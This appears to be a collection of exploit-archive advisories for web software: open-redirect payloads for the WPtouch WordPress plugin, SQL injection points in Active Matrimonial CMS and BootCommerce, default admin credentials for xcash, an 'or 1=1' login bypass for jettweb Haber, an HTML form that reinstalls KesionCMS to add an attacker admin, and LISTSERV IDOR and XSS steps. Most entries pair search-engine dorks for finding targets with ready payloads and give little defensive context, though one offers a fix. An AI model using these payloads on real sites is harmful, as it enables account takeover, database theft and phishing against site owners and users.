<pre><code>====================================================================================================================================<br />| # Title : WordPress - WPtouch Pro: 3.3.4 Open Redirect Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0(64-bit) | <br />| # Vendor : https://wordpress.org/plugins/wptouch/ | <br />| # Dork : wp-content/plugins/wptouch/ |<br />====================================================================================================================================<br /><br />P0C :<br /><br />== Description ==<br /><br /> WPtouch is a mobile plugin for WordPress that automatically adds a simple and elegant mobile theme for mobile visitors to your WordPress website.<br /> When you activate the plugin and set it up, it allows the site visitor to view it according to the device used for browsing<br /> However, when connected to a mobile device, Plugins allows you to switch the display between a desktop or a mobile device<br /> Desktop browsing does not allow you to convert<br /> But if we use the payload then it is possible.<br /> <br /> This URL Redirection vulnerability allows remote <br /> Attackers to redirect users to arbitrary websites and conduct phishing attacks<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] Use payload : /?wptouch_switch=desktop&redirect=https://packetstormsecurity.com<br /><br />[+] https://127.0.0.1/rsdsorg/?wptouch_switch=desktop&redirect=https://packetstormsecurity.com<br /><br /><br />Greetings to :=========================================================================================================================<br />jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm * thelastvvv *Zigoo.eg |<br />=======================================================================================================================================<br /></code></pre>
<pre><code>┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />││ C r a C k E r ┌┘<br />┌┘ T H E C R A C K O F E T E R N A L M I G H T ││<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br /> ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ [ Vulnerability ] ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: Author : CraCkEr :<br />│ Website : Activeitzone.com │<br />│ Vendor : ActiveITzone │<br />│ Software : Active Matrimonial CMS 3.6 │<br />│ Vuln Type: SQL Injection │<br />│ Impact : Database Access │<br />│ │<br />│────────────────────────────────────────────────────────────────────────────────────────│<br />│ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: :<br />│ Release Notes: │<br />│ ═════════════ │<br />│ │<br />│ SQL injection attacks can allow unauthorized access to sensitive data, modification of │<br />│ data and crash the application or make it unavailable, leading to lost revenue and │<br />│ damage to a company's reputation. │<br />│ │<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br />Greets:<br /><br /> The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL <br /> <br /> CryptoJob (Twitter) twitter.com/CryptozJob<br /> <br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ © CraCkEr 2023 ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br />Path: /matrimonial/member-listing<br /><br />GET parameter 'age_to' is vulnerable to SQLI<br /><br />https://www.website.com/matrimonial/member-listing?age_from=11&age_to=33[Inject-HERE]<br /><br /><br />[-] Done<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : WordPress -WPtouch 3.8.2 Open Redirect Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0(64-bit) | <br />| # Vendor : https://wordpress.org/plugins/wptouch/ | <br />| # Dork : wp-content/plugins/wptouch/ |<br />====================================================================================================================================<br /><br />P0C :<br /><br />== Description ==<br /><br /> WPtouch is a mobile plugin for WordPress that automatically adds a simple and elegant mobile theme for mobile visitors to your WordPress website.<br /> When you activate the plugin and set it up, it allows the site visitor to view it according to the device used for browsing<br /> However, when connected to a mobile device, Plugins allows you to switch the display between a desktop or a mobile device<br /> Desktop browsing does not allow you to convert<br /> But if we use the payload then it is possible.<br /> <br /> This URL Redirection vulnerability allows remote <br /> Attackers to redirect users to arbitrary websites and conduct phishing attacks<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] Use payload : /?wptouch_switch=desktop&redirect=https://packetstormsecurity.com/&nonce=e9c03107dd<br /><br />[+] http://127.0.0.1/pepsynet/?wptouch_switch=desktop&redirect=https://packetstormsecurity.com/&nonce=e9c03107dd<br /><br /><br />Greetings to :=========================================================================================================================<br />jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm * thelastvvv *Zigoo.eg |<br />=======================================================================================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : WordPress -WPtouch Pro 3.0.9.1 Open Redirect Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0(64-bit) | <br />| # Vendor : https://wordpress.org/plugins/wptouch/ | <br />| # Dork : wp-content/plugins/wptouch/ |<br />====================================================================================================================================<br /><br />P0C :<br /><br />== Description ==<br /><br /> WPtouch is a mobile plugin for WordPress that automatically adds a simple and elegant mobile theme for mobile visitors to your WordPress website.<br /> When you activate the plugin and set it up, it allows the site visitor to view it according to the device used for browsing<br /> However, when connected to a mobile device, Plugins allows you to switch the display between a desktop or a mobile device<br /> Desktop browsing does not allow you to convert<br /> But if we use the payload then it is possible.<br /> <br /> This URL Redirection vulnerability allows remote <br /> Attackers to redirect users to arbitrary websites and conduct phishing attacks<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] Use payload : /?wptouch_switch=desktop&redirect=https://packetstormsecurity.com<br /><br />[+] https://127.0.0.1/arabslabcom/?wptouch_switch=desktop&redirect=https://packetstormsecurity.com<br /><br /><br />Greetings to :=========================================================================================================================<br />jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm * thelastvvv *Zigoo.eg |<br />=======================================================================================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : xcash V1.5 Insecure Settings Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 103.0(64-bit) | <br />| # Vendor : https://appdevs.net/ | <br />| # Dork : "Mollitia saepe ipsam nihil soluta quaerat vitae commodi placeat." |<br /> "Take your chance to win the world’s biggest lotto jackpots" |<br /> "Complete solution for mobile money and wallet system. Comes with User" |<br />====================================================================================================================================<br /><br />poc :<br /><br />[+] The vulnerability is about leaving the default settings<br /> During the installation of the script and using the default username and password<br /> <br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] Use Payload : user=admin & pass=admin123 or admin<br /><br />[+] https://127.0.0.1/allpeorg/admin/dashboard<br /><br />Greetings to :=========================================================================================================================<br /> |<br />jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* moncet | <br /> |<br />=======================================================================================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : yazılımı jettweb Haber V3 Auth By Pass Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 68.0(32-bit) |<br />| # Vendor : http://haberv3.proemlaksitesi.net/ | <br />| # Dork : "yazılımı jettweb" |<br />====================================================================================================================================<br /><br />poc :<br /><br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] Use payload : User & Pass : 1' or 1=1 -- -<br /><br />[+] https://127.0.0.1/haberv3proemlaksitesinet/yonetim/index.php?sayfa=anasayfa<br /><br /><br />Greetings to :=========================================================================================================================<br /> |<br />jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* |<br /> |<br />=======================================================================================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : KesionCMS X1.5 Reinstall Add Admin Exploit |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 105.0.(32-bit) | <br />| # Vendor : https://www.kesion.com/ | <br />| # Dork : Powered by KesionCMS |<br />====================================================================================================================================<br /><br />poc :<br /><br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] copy & past this exploit listed below into a text file and save it with ".html" extension<br /><br />[+] Exploit<br /><br /> <head><title><br /> Hacked By indoushka<br /> </title><link href="http://www.tzxdcpv.com/install/images/guide.css" rel="stylesheet" /><br /> <script src="http://www.tzxdcpv.com/ks_inc/jquery.js" type="text/javascript"></script><br /> <script src="http://www.tzxdcpv.com/ks_inc/common.js" type="text/javascript"></script><br /> <script src="http://www.tzxdcpv.com/ks_inc/lhgdialog.js"></script><br /> </head><br /> <body> <br /> <form name="form" method="post" action="http://www.target.127.0.0.1/install/index.asp" id="form"><br /> <div class="guide"><br /> <div class="guidetitle"><br /> </div><br /> <div class="clear"></div><br /> </div><br /> <div class="clear"></div><br /> <input type="hidden" name="action" value="http://www.target.127.0.0.1/install/?action=s5" /><br /> <input type="hidden" name="DBlx" value="" /><br /> <input type="hidden" name="CkbData" value="" /><br /> <br /> <input type="hidden" name="TxtDBName_a" value="" /><br /> <input name="TxtDBService" value="" id="TxtDBService" class="text" type="hidden" /><br /> <input name="TxtDBName" value="" id="TxtDBName" class="text" type="hidden" /><br /> <input name="TxtDBUser" value="" id="TxtDBUser" class="text" type="hidden" /><br /> <input name="TxtDBPass" value="" id="TxtDBPass" class="text" type="hidden" /><br /> <br /><div id="http://www.target.127.0.0.1/install/?action=s4"><br /> <br /> <br /><br /> </div><br /> <div class="clear"></div><br /> <div class="sjlist"><br /> <h5>网站参数配置</h5><br /> <ul><br /> <li><span>网站名称:</span><input name="TxtSiteName" value="科兴网络开发" id="TxtSiteName" class="text" type="text"><font color="red">*</font> 如:Kesion官方站</li><br /> <li><span>网站域名:</span><input name="TxtSiteUrl" value="http://cxsecurity.com" id="TxtSiteUrl" class="text" type="text"><font color="red">*</font> 后面不要带“/”。 <br /> 如http://www.kesion.com。<br /> </li><br /> <li><span>安装目录:</span><input name="TxtInstallDir" value="/" id="TxtInstallDir" class="text" type="text"><font color="red">*</font> 后面不要带“/”。 <br /> 系统会自动获取,建议不要修改。<br /> </li><br /> <li><span>授 权 码:</span><input name="TxtSiteKey" value="0" id="TxtSiteKey" class="text" type="text"><br /> 免费版本用户请留空或填“0”。<br /> </li><br /> <li><span>后台目录:</span><input name="TxtManageDir" value="Admin/" id="TxtManageDir" class="text" type="text"><font color="red">*</font> 如:Manage,Admin,后面必须带"/"符号。</li><br /> <li><span> 后台登录验证码:</span><br /> <input type="radio" name="isCode_a" value="True" /> 启用 <br /> <input type="radio" value="False" name="isCode_a" checked="checked"/> 不启用<br /> </li><br /> <br /> <li><span>管理认证码:</span><br /> <input type="radio" name="isCode" value="True" onclick="$('#rzm').show()"/> 启用 <input onclick="$('#rzm').hide()" type="radio" value="False" name="isCode" checked="checked" /> 不启用 <br /> <font id="rzm" style="display:none">认证码:<input name="TxtManageCode" value="8888" id="TxtManageCode" class="text" style="width:100px;" type="text"></font></li><br /> </ul><br /> <div class="clear"></div><br /> <h5>填写管理员信息</h5><br /> <ul><br /> <li><span>管理员账号:</span><input name="TxtUserName" value="admin" id="TxtUserName" class="text" type="text"><font color="red">*</font> </li><br /> <li><span>管理员密码:</span><input name="TxtUserPass" value="admin888" id="TxtUserPass" class="text" type="text"><font color="red">*</font> 管理员密码不能为空</li><br /> <li><span>重复密码:</span><input name="TxtReUserPass" value="admin888" id="TxtReUserPass" class="text" type="text"></li><br /> </ul><br /> <div class="clear blank10"></div><br /> <br /> <div style="padding:5px"><br /> <input name="Button1" value="下一步" onClick="return(doCheck());" id="Button1" class="btnbg" type="submit"><br /> </div><br /> </div><br /><br /><br />[+] at Line 09 & 16 change the domain name of target<br /><br /><br />Greetings to :=========================================================================================================================<br /> |<br />jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* | <br /> |<br />=======================================================================================================================================<br /></code></pre>
<pre><code># Exploit Title: LISTSERV 17 - Insecure Direct Object Reference (IDOR)<br /># Exploit Author: Shaunt D<br /># Vendor Homepage: https://www.lsoft.com/<br /># Version: 17<br /># Tested on: Windows Server 2019<br /># CVE : CVE-2022-40319<br /><br /># Steps to replicate<br />1. Create two accounts on your LISTSERV 17 installation, logging into each one in a different browser or container.<br />2. Intercept your attacking profile's browser traffic using Burp.<br />3. When logging in, you'll be taken to a URL with your email address in the Y parameter (i.e. http://example.com/scripts/wa.exe?INDEX&X=[session-id]&Y=[email-address]).<br />4. Click on your email address on the top right and select "Edit profile".<br />5. In Burp, change the email address in the URL's Y parameter to the email address of your victim account.<br />4. Next, the "WALOGIN" cookie value will be an ASCII encoded version of your email address. Using Burp Decoder, ASCII encode your victim's email address and replace the "WALOGIN" cookie value with that.5. Submit this request. You should now be accessing/editing the victim's profile. You can make modifications and access any information in this profile as long as you replace those two values in Burp for each request.<br /></code></pre>
<pre><code># Exploit Title: LISTSERV 17 - Reflected Cross Site Scripting (XSS)<br /># Exploit Author: Shaunt D<br /># Vendor Homepage: https://www.lsoft.com/<br /># Version: 17<br /># Tested on: Windows Server 2019<br /># CVE : CVE-2022-39195<br /><br />A reflected cross-site scripting (XSS) vulnerability in the LISTSERV 17 web interface allows remote attackers to inject arbitrary JavaScript or HTML via the "c" parameter.<br /><br />To reproduce, please visit<br /><br />http://localhost/scripts/wa.exe?TICKET=test&c=%3Cscript%3Ealert(1)%3C/script%3E<br />(or whichever URL you can use for testing instead of localhost).<br /><br />The "c" parameter will reflect any value given onto the page.<br /><br /># Solution<br /><br />This vulnerability can be mitigated by going under "Server Administration" to "Web Templates" and editing the BODY-LCMD-MESSAGE web template. Change &+CMD; to &+HTMLENCODE(&+CMD;); .<br /></code></pre>
<pre><code>┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />││ C r a C k E r ┌┘<br />┌┘ T H E C R A C K O F E T E R N A L M I G H T ││<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br /> ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ [ Vulnerability ] ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: Author : CraCkEr :<br />│ Website : https://www.mrplugins.it/bootcommerce/ │<br />│ Vendor : MrPlugins │<br />│ Software : BootCommerce 3.2.1 │<br />│ Vuln Type: SQL Injection │<br />│ Impact : Database Access │<br />│ │<br />│────────────────────────────────────────────────────────────────────────────────────────│<br />│ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: :<br />│ Release Notes: │<br />│ ═════════════ │<br />│ │<br />│ SQL injection attacks can allow unauthorized access to sensitive data, modification of │<br />│ data and crash the application or make it unavailable, leading to lost revenue and │<br />│ damage to a company's reputation. │<br />│ │<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br />Greets:<br /><br /> The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL <br /> <br /> CryptoJob (Twitter) twitter.com/CryptozJob<br /> <br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ © CraCkEr 2023 ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br />Path: /bootcommerce/content/products/Books/?p=1&prc=5,12&of=false<br /><br />GET parameter 'prc' is vulnerable to SQLI<br /><br />https://www.target.com/bootcommerce/content/products/Books/?p=1&prc=5,12[Inject-HERE]&of=false<br /><br /><br />[-] Done<br /></code></pre>